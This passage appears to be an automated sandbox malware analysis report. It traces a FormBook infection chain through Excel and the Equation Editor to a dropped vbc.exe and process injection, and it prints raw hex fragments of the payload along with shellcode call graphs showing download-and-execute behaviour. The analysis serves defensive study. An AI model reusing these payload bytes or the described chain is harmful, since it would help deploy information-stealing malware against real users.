    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~b.v| @ `pWP H.textu v `.relocx@B.rsrcz@@HPD="(*0(>*06+&(((:E-&&( y(%& ~(%&( ( (( ( (( ( (%&( (%& ((((:E&((9&(((%&:E&(((%&(& (8$((%((%,(~?%0(%4(
    May 14, 2022 15:14:12.687892914 CEST5INData Raw: 1f 38 28 11 00 00 06 8c 05 00 00 01 a2 13 06 1f 3c 28 11 00 00 06 28 06 00 00 06 2c 72 26 20 a3 e7 07 00 28 18 00 00 06 25 26 0c 20 d6 e7 07 00 28 18 00 00 06 25 26 0d 20 e9 e7 07 00 28 18 00 00 06 25 26 20 5a e8 07 00 28 18 00 00 06 20 6f e8 07
    Data Ascii: 8(<((,r& (%& (%& (%& Z( o(%&(%&+&@(+ (%&(w%&8ED(EfH(+*0+&L( (%& y( ~
    May 14, 2022 15:14:12.687918901 CEST | 6 | IN | Data Raw: 2f 0b 18 45 01 00 00 00 f6 ff ff ff 2a 7e 02 00 00 04 03 02 16 06 28 47 00 00 0a 2a 00 00 13 30 05 00 56 00 00 00 07 00 00 11 7e 05 00 00 04 2d 4e 1b 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 16 00 00 06 26 72 85 00 00 70 0a 06 28 1d 00 00 0a 0b 28
    Data Ascii: /E*~(G*0V~-NE-&rp((AioB%&(o%&aj(*0(*0~ _-~X8~@_-8E-&~ _
    May 14, 2022 15:14:12.687942028 CEST | 7 | IN | Data Raw: 06 32 bb 1c 45 01 00 00 00 f6 ff ff ff 06 11 0d 16 06 28 ac 00 00 06 11 0e 6a 59 69 28 c8 00 00 06 26 11 0a 11 0d 16 06 28 ac 00 00 06 25 26 11 0e 6a 59 69 28 91 00 00 06 13 10 7e 0a 00 00 04 11 10 16 11 10 28 97 00 00 06 69 28 d8 00 00 06 7e 0a
    Data Ascii: 2E(jYi(&(%&jYi(~(i(~j(~_9~-DE~ 3E~(iZ({+~~({~j(( (6%&(1
    May 14, 2022 15:14:12.906400919 CEST | 9 | IN | Data Raw: 51 00 00 0a 25 26 13 10 16 13 11 38 2f 01 00 00 11 10 11 11 9a 0d 07 6f 55 00 00 0a 13 05 11 05 28 6a 00 00 06 25 26 69 13 06 11 06 28 8d 00 00 06 13 07 16 13 08 2b 17 11 07 11 08 11 05 11 08 9a 6f 59 00 00 0a 25 26 a2 11 08 17 58 13 08 11 08 11
    Data Ascii: Q%&8/oU(j%&i(+oY%&X2E~?oV%&s[o\%&1~]o^1~_o^1E~`o^1~ao^13E+~boc
    May 14, 2022 15:14:12.906440020 CEST | 10 | IN | Data Raw: ff ff ff 00 28 23 00 00 06 2a 00 00 32 7e 5a 00 00 04 02 28 4c 00 00 06 2a 00 00 00 56 20 18 00 00 02 20 0a 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 36 7e 5b 00 00 04 02 03 28 50 00 00 06 2a 00 00 56 20 19 00 00 02 20 0b 00 00 0a 20 ff ff
    Data Ascii: (#*2~Z(L*V (#*6~[(P*V (#*.~\(T*V (&*.~](X*V (#*:~^(\*V (&*.~_(`*V (#*2~`
    May 14, 2022 15:14:12.906470060 CEST | 12 | IN | Data Raw: 41 00 00 02 20 29 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 3e 7e 7c 00 00 04 02 03 04 05 28 d7 00 00 06 2a 1e 02 74 01 00 00 1b 2a 56 20 43 00 00 02 20 2a 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 36 7e 7d 00 00 04 02 03 28 dc 00 00
    Data Ascii: A ) (#*>~|(*t*V C * (#*6~}(*V D + (#*2~~(*V E , (#*2~(*V F - (#*:~(*V G . (#*2~(*
    May 14, 2022 15:14:12.906497955 CEST | 13 | IN | Data Raw: 1a 22 8b 01 e6 a3 78 60 06 51 14 c8 92 71 b8 5c de 5b 48 e1 02 a3 ed 9f b0 af 27 f6 d9 74 76 f6 73 a6 fa c2 58 e2 ae 89 1e e8 dd c0 2c 03 74 8c 23 59 6e 3e 7f b3 aa c6 49 57 fc 31 10 33 42 3e 23 4e c1 c8 34 50 4d 71 df ce 15 62 e4 2e af 7b a9 17
    Data Ascii: "x`Qq\[H'tvsX,t#Yn>IW13B>#N4PMqb.{] M*(:Crk<?;nn\N{x@x(L4EsL?edUbUhFR)@tb\QS&Ii4ztTmL ( (6iJi;n,8JIE(Y{run &H
    May 14, 2022 15:14:12.906524897 CEST | 14 | IN | Data Raw: 04 e2 f1 7e 54 34 9c dc f0 5e ae 26 d4 50 47 cf af 16 b7 6d 34 0e a2 38 84 3b a4 94 dd f0 66 50 e0 d5 0d 64 bb f0 54 2a 63 22 87 81 3f f9 48 6b de c5 94 e3 fe c1 72 b7 91 a0 da 7a ae aa 8f 7d 1d 60 f4 8d 5c e1 46 6a 9e 8f 0b 3d d8 3b 40 52 b5 8b
    Data Ascii: ~T4^&PGm48;fPdT*c"?Hkrz}`\Fj=;@RL6"K4N.wQ/h$XlHx+"od+(|`$jaDQUMOH\IlyVj6+em,8Hu}NyeP
    May 14, 2022 15:14:12.906553984 CEST | 16 | IN | Data Raw: c2 d3 ea ec 11 0e ce 4d 04 c7 02 c6 74 b5 2c 78 92 4c fa bf ba 29 e8 03 f4 c8 1c 58 3f 88 6b f4 de c5 ce 57 ba aa d2 14 fa 37 c5 38 df 34 3c cd a7 c4 3c 49 fe 23 be 01 5e b0 2b 5c 20 b2 2b 3e 7d b4 b9 bf f8 c5 3e f8 33 57 88 7a 26 18 7c 18 2a ed
    Data Ascii: Mt,xL)X?kW784<<I#^+\ +>}>3Wz&|*+q|2A;ZEDq?F{lN}6k)Y\Ks0M5F)n`-DKlC6X/U\6;K2BAbv7>c\L][5%{?.9Ob16?}(s#
    May 14, 2022 15:14:12.910749912 CEST | 17 | IN | Data Raw: 08 12 1a 7e bb e4 91 91 93 e7 63 56 a2 6c 20 ad 57 be 9e aa 10 e3 e3 16 5c 7f 90 93 dc ae 69 6c 62 17 fb a0 17 14 5b df 11 ad f9 6e 01 0e 25 3f 5a 64 2a 30 fe 7f dd bd 25 95 ff 06 36 36 6c 4d 0f 76 d2 17 8a 1d 37 ac 0d 5b d1 a9 99 21 6e 0d de 6a
    Data Ascii: ~cVl W\ilb[n%?Zd*0%66lMv7[!njHNxXaY]5'LRZnL7;%xGiL'7rY494|ZVnBQPI-zaQ|F)9Tk\^FD_fnBe3'I 2&\:ur



    Target ID: 0
    Start time: 15:14:14
    Start date: 14/05/2022
    Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit): false
    Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase: 0x13f780000
    File size: 28253536 bytes
    MD5 hash: D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: C, C++ or other language
    Reputation: high

    Target ID: 2
    Start time: 15:14:38
    Start date: 14/05/2022
    Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit): true
    Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase: 0x400000
    File size: 543304 bytes
    MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: C, C++ or other language
    Reputation: high

    Target ID: 4
    Start time: 15:14:42
    Start date: 14/05/2022
    Path: C:\Users\Public\vbc.exe
    Wow64 process (32bit): true
    Commandline: "C:\Users\Public\vbc.exe"
    Imagebase: 0x300000
    File size: 229376 bytes
    MD5 hash: CE42FE431B88922AB59B6FD880CADCF6
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: .Net C# or VB.NET
    Yara matches:
    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 41%, ReversingLabs
    Reputation: low

    Target ID: 5
    Start time: 15:14:44
    Start date: 14/05/2022
    Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Wow64 process (32bit): false
    Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Imagebase: 0x1e0000
    File size: 55488 bytes
    MD5 hash: 6D0C232D1F4CD357FD7C14ED6FABFA90
    Has elevated privileges: true
    Has administrator privileges: true
    Programmed in: C, C++ or other language
    Reputation: moderate


      Execution Graph

      Execution Coverage: 30.9%
      Dynamic/Decrypted Code Coverage: 0%
      Signature Coverage: 71.7%
      Total number of Nodes: 113
      Total number of Limit Nodes: 11
      execution_graph 503 36304f5 528 3630531 503->528 505 3630524 511 363053e 505->511 552 363054d 505->552 507 3630586 508 36305bf 509 36305d7 16 API calls 508->509 510 36305c4 509->510 512 3630648 12 API calls 510->512 511->507 511->508 511->510 513 363056c 511->513 514 36305e8 URLDownloadToFileW 512->514 513->510 515 363056e 513->515 518 3630682 514->518 519 3630692 8 API calls 514->519 576 36305a8 515->576 520 36306a9 5 API calls 518->520 519->518 521 3630699 520->521 522 36306a8 ShellExecuteExW 521->522 524 36306ff 521->524 523 36306c7 2 API calls 522->523 525 36306bb 522->525 523->525 525->524 526 36306ca ExitProcess GetPEB 525->526 527 36306dc 526->527 529 3630537 528->529 530 363054d 25 API calls 529->530 535 363053e 530->535 531 3630586 532 36305bf 533 36305d7 16 API calls 532->533 534 36305c4 533->534 536 3630648 12 API calls 534->536 535->531 535->532 535->534 537 363056c 535->537 538 36305e8 URLDownloadToFileW 536->538 537->534 539 363056e 537->539 542 3630682 538->542 543 3630692 8 API calls 538->543 541 36305a8 21 API calls 539->541 541->531 544 36306a9 5 API calls 542->544 543->542 545 3630699 544->545 546 36306a8 ShellExecuteExW 545->546 548 36306ff 545->548 547 36306c7 2 API calls 546->547 549 36306bb 546->549 547->549 548->505 549->548 550 36306ca ExitProcess GetPEB 549->550 551 36306dc 550->551 551->505 553 3630553 552->553 580 3630574 553->580 577 36305aa 576->577 578 36305bd 21 API calls 577->578 579 36305af 578->579 581 3630577 580->581 582 36305a8 21 API calls 581->582 583 3630586 582->583 436 36305a8 437 36305aa 436->437 440 36305bd LoadLibraryW 437->440 439 36305af 441 36305bf 440->441 457 36305d7 441->457 443 36305c4 472 3630648 URLDownloadToFileW 443->472 445 36305e8 URLDownloadToFileW 447 3630682 445->447 483 3630692 445->483 493 36306a9 447->493 450 3630699 451 36306a8 ShellExecuteExW 450->451 453 36306ff 450->453 454 36306bb 451->454 500 36306c7 451->500 453->439 454->453 455 36306ca ExitProcess GetPEB 454->455 456 36306dc 455->456 
456->439 458 36305da 457->458 459 3630648 12 API calls 458->459 460 36305e8 URLDownloadToFileW 458->460 459->460 462 3630682 460->462 463 3630692 8 API calls 460->463 464 36306a9 5 API calls 462->464 463->462 465 3630699 464->465 466 36306a8 ShellExecuteExW 465->466 468 36306ff 465->468 467 36306c7 2 API calls 466->467 469 36306bb 466->469 467->469 468->443 469->468 470 36306ca ExitProcess GetPEB 469->470 471 36306dc 470->471 471->443 473 3630692 8 API calls 472->473 474 3630682 473->474 475 36306a9 5 API calls 474->475 476 3630699 475->476 477 36306ff 476->477 478 36306a8 ShellExecuteExW 476->478 477->445 479 36306c7 2 API calls 478->479 480 36306bb 478->480 479->480 480->477 481 36306ca ExitProcess GetPEB 480->481 482 36306dc 481->482 482->445 484 3630694 483->484 485 3630699 484->485 486 36306a9 5 API calls 484->486 487 36306a8 ShellExecuteExW 485->487 489 36306ff 485->489 486->485 488 36306c7 2 API calls 487->488 490 36306bb 487->490 488->490 489->447 490->489 491 36306ca ExitProcess GetPEB 490->491 492 36306dc 491->492 492->447 494 36306ac ShellExecuteExW 493->494 495 36306c7 2 API calls 494->495 496 36306bb 495->496 497 36306ca ExitProcess GetPEB 496->497 498 3630702 496->498 499 36306dc 497->499 498->450 499->450 501 36306ca ExitProcess GetPEB 500->501 502 36306dc 501->502 502->454

      Callgraph

      • Executed
      • Not Executed
      • Opacity -> Relevance
      • Disassembly available
      callgraph 0 Function_03630260 1 Function_036306C7 15 Function_036306F6 1->15 2 Function_03630747 3 Function_036306A9 3->1 3->15 4 Function_03630489 5 Function_03630648 5->1 5->3 11 Function_03630692 5->11 5->15 6 Function_036305A8 18 Function_036305BD 6->18 7 Function_0363054D 7->1 7->2 7->3 7->5 7->6 7->11 13 Function_036305D7 7->13 7->15 17 Function_03630574 7->17 8 Function_036300AC 9 Function_036300EC 10 Function_036300F2 11->1 11->3 11->15 12 Function_03630531 12->1 12->2 12->3 12->5 12->6 12->7 12->11 12->13 12->15 13->1 13->3 13->5 13->11 13->15 14 Function_03630336 16 Function_036304F5 16->1 16->3 16->5 16->6 16->7 16->11 16->12 16->13 16->15 17->6 18->1 18->3 18->5 18->11 18->13 18->15

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 36305bd-363067b LoadLibraryW call 36305d7 call 3630648 URLDownloadToFileW 13 3630682-363069f call 36306a9 0->13 14 363067d call 3630692 0->14 18 36306a1-36306a6 13->18 19 3630706-363070a 13->19 14->13 22 36306a8-36306b4 ShellExecuteExW 18->22 23 36306ff 18->23 20 3630735-363073e 19->20 21 363070c 19->21 24 3630702-3630705 20->24 25 3630710 21->25 26 36306bb-36306bc 22->26 27 36306b6 call 36306c7 22->27 23->24 30 3630740 24->30 31 3630707-363070a 24->31 32 3630712-3630716 25->32 33 3630718-363071c 25->33 28 3630727-363072b 26->28 29 36306be 26->29 27->26 34 363072f 28->34 35 363072d 28->35 29->25 36 36306c0 29->36 37 3630743-3630744 30->37 31->20 31->21 32->33 38 3630724 32->38 39 3630731-3630733 33->39 40 363071e-3630722 33->40 34->20 34->39 35->39 36->39 41 36306c2-36306d9 ExitProcess GetPEB 36->41 38->28 39->37 40->38 40->39 44 36306dc-36306ed call 36306f6 41->44 47 36306ef-36306f3 44->47
      APIs
      • LoadLibraryW.KERNEL32(036305AF,?,0363055A,?,0363053E,?,03630524), ref: 036305BD
        • Part of subcall function 036305D7: URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
        • Part of subcall function 036305D7: ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 036305D7: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
      • String ID: <
      • API String ID: 2508257586-4251816714
      • Opcode ID: e3fa349b09c7b28d28d168733c1d157eefcfd4761e58ac0dc984162edec12ad3
      • Instruction ID: a4c853b45391b5e7f1d73fcf0b6ab29b62c975d56b230b2407a1c7d015bda93a
      • Opcode Fuzzy Hash: e3fa349b09c7b28d28d168733c1d157eefcfd4761e58ac0dc984162edec12ad3
      • Instruction Fuzzy Hash: B931CBA284C3C16FC723D7304C7D69ABFA46F97100F098ACFC0C60A8A3E7689419C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 48 3630531-363053f call 3630747 call 363054d 53 3630592-36305b1 48->53 54 3630542 48->54 56 36305b3-36305bb 53->56 54->56 57 3630544-3630547 54->57 58 363054a 57->58 59 36305af-36305b0 57->59 60 36305bf-36305cc call 36305d7 58->60 61 363054c-363055b 58->61 59->56 63 36305cd-36305d2 60->63 61->63 64 363055d-3630562 61->64 66 36305d5-36305de 63->66 64->63 67 3630564 64->67 69 36305e0-363067b call 3630648 URLDownloadToFileW 66->69 67->66 70 3630566-363056a 67->70 80 3630682-363069f call 36306a9 69->80 81 363067d call 3630692 69->81 70->60 72 363056c 70->72 72->69 74 363056e-363058f call 36305a8 72->74 74->53 86 36306a1-36306a6 80->86 87 3630706-363070a 80->87 81->80 90 36306a8-36306b4 ShellExecuteExW 86->90 91 36306ff 86->91 88 3630735-363073e 87->88 89 363070c 87->89 92 3630702-3630705 88->92 93 3630710 89->93 94 36306bb-36306bc 90->94 95 36306b6 call 36306c7 90->95 91->92 98 3630740 92->98 99 3630707-363070a 92->99 100 3630712-3630716 93->100 101 3630718-363071c 93->101 96 3630727-363072b 94->96 97 36306be 94->97 95->94 102 363072f 96->102 103 363072d 96->103 97->93 104 36306c0 97->104 105 3630743-3630744 98->105 99->88 99->89 100->101 106 3630724 100->106 107 3630731-3630733 101->107 108 363071e-3630722 101->108 102->88 102->107 103->107 104->107 109 36306c2-36306d9 ExitProcess GetPEB 104->109 106->96 107->105 108->106 108->107 112 36306dc-36306ed call 36306f6 109->112 115 36306ef-36306f3 112->115
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteFileShell
      • String ID: <
      • API String ID: 2825088817-4251816714
      • Opcode ID: 2d063ae66f6e40c067b99e310a9672f65aff461719b5f61d72c3bf481ca49ee2
      • Instruction ID: ebdb76ee9a1346691f2dfd95d2c17be2fc46c9e9e331bbaef77cadabf1d35d67
      • Opcode Fuzzy Hash: 2d063ae66f6e40c067b99e310a9672f65aff461719b5f61d72c3bf481ca49ee2
      • Instruction Fuzzy Hash: 1751EBA684D3C06FC713D7304E7D296BFA4AF93110F1D8ACFC0C64A4A3E6689509C766
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 116 363054d-363055b call 3630747 call 3630574 121 36305cd-36305d2 116->121 122 363055d-3630562 116->122 123 36305d5-36305de 121->123 122->121 124 3630564 122->124 125 36305e0-363067b call 3630648 URLDownloadToFileW 123->125 124->123 126 3630566-363056a 124->126 140 3630682-363069f call 36306a9 125->140 141 363067d call 3630692 125->141 128 36305bf-36305cc call 36305d7 126->128 129 363056c 126->129 128->121 129->125 131 363056e-36305bb call 36305a8 129->131 149 36306a1-36306a6 140->149 150 3630706-363070a 140->150 141->140 153 36306a8-36306b4 ShellExecuteExW 149->153 154 36306ff 149->154 151 3630735-363073e 150->151 152 363070c 150->152 155 3630702-3630705 151->155 156 3630710 152->156 157 36306bb-36306bc 153->157 158 36306b6 call 36306c7 153->158 154->155 161 3630740 155->161 162 3630707-363070a 155->162 163 3630712-3630716 156->163 164 3630718-363071c 156->164 159 3630727-363072b 157->159 160 36306be 157->160 158->157 165 363072f 159->165 166 363072d 159->166 160->156 167 36306c0 160->167 168 3630743-3630744 161->168 162->151 162->152 163->164 169 3630724 163->169 170 3630731-3630733 164->170 171 363071e-3630722 164->171 165->151 165->170 166->170 167->170 172 36306c2-36306d9 ExitProcess GetPEB 167->172 169->159 170->168 171->169 171->170 175 36306dc-36306ed call 36306f6 172->175 178 36306ef-36306f3 175->178
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
      • ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 2edc93f13a911dd6667c559ae509b2e2b6ba369b17bfa67043b288719e202f72
      • Instruction ID: 4437bdac0c3ed51125f32ef102a4da0da114072579a9da120aa2e36bdea5d11e
      • Opcode Fuzzy Hash: 2edc93f13a911dd6667c559ae509b2e2b6ba369b17bfa67043b288719e202f72
      • Instruction Fuzzy Hash: AC41EAA684D3C16FC723D7304E7D68ABFA0AF93110F0C8ACFC0C64A5A3E6689509C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 179 36305d7-36305e2 181 36305e8-363067b URLDownloadToFileW 179->181 182 36305e3 call 3630648 179->182 186 3630682-363069f call 36306a9 181->186 187 363067d call 3630692 181->187 182->181 191 36306a1-36306a6 186->191 192 3630706-363070a 186->192 187->186 195 36306a8-36306b4 ShellExecuteExW 191->195 196 36306ff 191->196 193 3630735-363073e 192->193 194 363070c 192->194 197 3630702-3630705 193->197 198 3630710 194->198 199 36306bb-36306bc 195->199 200 36306b6 call 36306c7 195->200 196->197 203 3630740 197->203 204 3630707-363070a 197->204 205 3630712-3630716 198->205 206 3630718-363071c 198->206 201 3630727-363072b 199->201 202 36306be 199->202 200->199 207 363072f 201->207 208 363072d 201->208 202->198 209 36306c0 202->209 210 3630743-3630744 203->210 204->193 204->194 205->206 211 3630724 205->211 212 3630731-3630733 206->212 213 363071e-3630722 206->213 207->193 207->212 208->212 209->212 214 36306c2-36306d9 ExitProcess GetPEB 209->214 211->201 212->210 213->211 213->212 217 36306dc-36306ed call 36306f6 214->217 220 36306ef-36306f3 217->220
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 94ae4d78d863e5a8cbe664ecc63ab0d8aaf100ecd86679cb0e8b23738b561987
      • Instruction ID: 9e5c9899d67a11b0a0373a6625d1d94b5d7e3a2407787d32f1492a12e4f33263
      • Opcode Fuzzy Hash: 94ae4d78d863e5a8cbe664ecc63ab0d8aaf100ecd86679cb0e8b23738b561987
      • Instruction Fuzzy Hash: AB31A9A694C3C16FC723D7308C7C65ABFA46F97100F098ACFC0C64A8A3E6A89409C756
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 221 3630648-363069f URLDownloadToFileW call 3630692 call 36306a9 227 36306a1-36306a6 221->227 228 3630706-363070a 221->228 231 36306a8-36306b4 ShellExecuteExW 227->231 232 36306ff 227->232 229 3630735-363073e 228->229 230 363070c 228->230 233 3630702-3630705 229->233 234 3630710 230->234 235 36306bb-36306bc 231->235 236 36306b6 call 36306c7 231->236 232->233 239 3630740 233->239 240 3630707-363070a 233->240 241 3630712-3630716 234->241 242 3630718-363071c 234->242 237 3630727-363072b 235->237 238 36306be 235->238 236->235 243 363072f 237->243 244 363072d 237->244 238->234 245 36306c0 238->245 246 3630743-3630744 239->246 240->229 240->230 241->242 247 3630724 241->247 248 3630731-3630733 242->248 249 363071e-3630722 242->249 243->229 243->248 244->248 245->248 250 36306c2-36306d9 ExitProcess GetPEB 245->250 247->237 248->246 249->247 249->248 253 36306dc-36306ed call 36306f6 250->253 256 36306ef-36306f3 253->256
      APIs
      • URLDownloadToFileW.URLMON(00000000,036305E8,?,00000000,00000000,?,0363055A,?,0363053E,?,03630524), ref: 0363064A
        • Part of subcall function 03630692: ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 03630692: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID: <
      • API String ID: 3584569557-4251816714
      • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
      • Instruction ID: 23799401d956c81946726c9b2abd694a23495fbdff8fcedf812268134e27026c
      • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
      • Instruction Fuzzy Hash: 6301F4B984D3849AD761E7748C9C7ABBFE4AFC7200F14095DD0978A1A6DA78C41CCB0A
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference ShellExecuteExW, ExitProcess, GetPEB]
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
      • Instruction ID: 92a69ae789eab92b789bb92d730fb906db4de5af9781644a2616467d9b643b87
      • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
      • Instruction Fuzzy Hash: D701265880930664DA70F72C495C5AFEBF4EB87240FEC8496D49304164D668809FCE5D
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference ShellExecuteExW, ExitProcess, GetPEB]
      APIs
      • ShellExecuteExW.SHELL32(0000003C), ref: 036306B4
        • Part of subcall function 036306C7: ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExecuteExitProcessShell
      • String ID:
      • API String ID: 1124553745-0
      • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
      • Instruction ID: 572a2bf4a5276ee913f196c504e87edc0eed7a785078d2a05974ad802c680340
      • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
      • Instruction Fuzzy Hash: 48F0FF9980424261DB70F22C895D6EBABB5AB83200FCC8897C88300289D66881CBCE99
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; node labels reference ExitProcess, GetPEB]
      APIs
      • ExitProcess.KERNEL32(00000000,?,036306BB), ref: 036306CC
      Memory Dump Source
      • Source File: 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3630000_EQNEDT32.jbxd
      Similarity
      • API ID: ExitProcess
      • String ID:
      • API String ID: 621844428-0
      • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
      • Instruction ID: 2681ba391d66bbc9c1eba01d2dd82216bccff61528be83d10fbf8b5b5f6812f7
      • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
      • Instruction Fuzzy Hash: 9DD017712416069FD204EB14CD80F27F76AFFD9621F24C268E5094B659C730E8A2CAA4
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:22.2%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:0%
      Total number of Nodes:32
      Total number of Limit Nodes:2
      [execution graph rendering not reproduced; node labels reference VirtualAllocEx, CreateProcessA]

      Control-flow Graph

      [control-flow graph rendering not reproduced; no API-labelled nodes]
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID: #4
      • API String ID: 0-3737424171
      • Opcode ID: 2a82e9776cde5fb6e2133800e1fdf1d4f34b7449868c4fba46d348f3859ad79a
      • Instruction ID: 861548539938d551d36cb04cb47d3202a8dda883a598e7131b7f415377baab2b
      • Opcode Fuzzy Hash: 2a82e9776cde5fb6e2133800e1fdf1d4f34b7449868c4fba46d348f3859ad79a
      • Instruction Fuzzy Hash: E4328274E04269CFDB64CF65DD84B9DBBB6BB49300F1081AAD81AA7790DB315E85CF10
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      [control-flow graph rendering not reproduced; no API-labelled nodes]
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d820be5a321a6eeea8edd622642f0645f775ad203e816a2959225a46689ae1bb
